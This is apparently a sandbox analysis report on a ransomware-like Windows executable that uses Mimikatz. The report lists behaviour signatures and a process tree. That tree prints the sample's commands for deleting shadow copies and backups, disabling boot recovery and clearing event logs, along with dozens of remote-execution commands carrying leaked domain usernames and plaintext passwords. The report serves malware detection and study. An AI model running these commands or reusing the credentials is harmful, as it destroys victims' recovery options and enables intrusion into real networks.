Resubmissions

26-08-2024 09:41

240826-ln48csyerj 10

29-01-2022 07:52

220129-jqhe9sgcg5 10

Analysis

  • max time kernel
    141s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    26-08-2024 09:41

General

  • Target

    32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe

  • Size

    1.8MB

  • MD5

    59c3f3f99f44029de81293b1e7c37ed2

  • SHA1

    fb07496900468529719f07ed4b7432ece97a8d3d

  • SHA256

    32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471

  • SHA512

    9b3bd8a76d754bf9c899111be986c4fd6d14f6993a9a0e3dcd9b4a76c0f7764ac8798f5cbc7a0467c1562638d85bf52f627bd32c125f587b1e838beaf03c8a0e

  • SSDEEP

    49152:aIuQjMgjzus3wLNlDXjUoXFhKoT2iG6xQQqOeaGcWRrLy3pN+:a1bgjyQwhlDFEi5Qt7aGdRrLy5N

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Clears Windows event logs 1 TTPs 2 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 1 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Executes dropped EXE 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
    "C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Users\Admin\AppData\Local\Temp\zhkyc.exe
      123 \\.\pipe\06680FF4-C391-462A-BF13-76FFBFD8210D
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1012
    • C:\Users\Admin\AppData\Local\Temp\fxugs.exe
      123 \\.\pipe\05598AD7-E27D-4D86-9465-FB9CEB12B8B5
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1020
    • C:\Users\Admin\AppData\Local\Temp\_yjy.exe
      "C:\Users\Admin\AppData\Local\Temp\_yjy.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1288
        • \??\c:\Windows\system32\vssadmin.exe
          c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:1524
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\system32\wbadmin.exe
          wbadmin.exe delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:848
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3844
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled no
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:3324
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:660
        • C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl System
          4⤵
          • Clears Windows event logs
          • Suspicious use of AdjustPrivilegeToken
          PID:776
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4668
        • C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl Security
          4⤵
          • Clears Windows event logs
          • Suspicious use of AdjustPrivilegeToken
          PID:1440
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:1820
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:2632
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:3120
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2400
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2720
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4164
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4744
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4840
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:2460
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3148
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:1492
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:3732
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1244
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4388
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2552
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:1160
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:752
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:1800
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3796
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4148
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:2152
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1424
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1308
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:4844
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:1420
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3432
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2184
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:4636
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4532
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:4852
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1268
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:1160
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:752
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1800
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:3796
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3124
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4156
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:2348
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1448
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:4936
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:1936
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4612
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:792
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:2296
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:3000
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:3732
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:4040
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\static.208.169.12.49.clients.your-server.de -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3680
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.251 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2948
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:2476
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:5016
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2344
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:3760
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:5028
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3828
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3064
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3228
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4156
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      PID:5048
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3568
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:4840
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:416
    • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
      C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
      2⤵
        PID:4920
      • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
        C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
        2⤵
          PID:3644
        • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
          C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4608
        • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
          C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3432
        • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
          C:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"
          2⤵
            PID:3732
          • C:\Users\Admin\AppData\Local\Temp\_vqv.exe
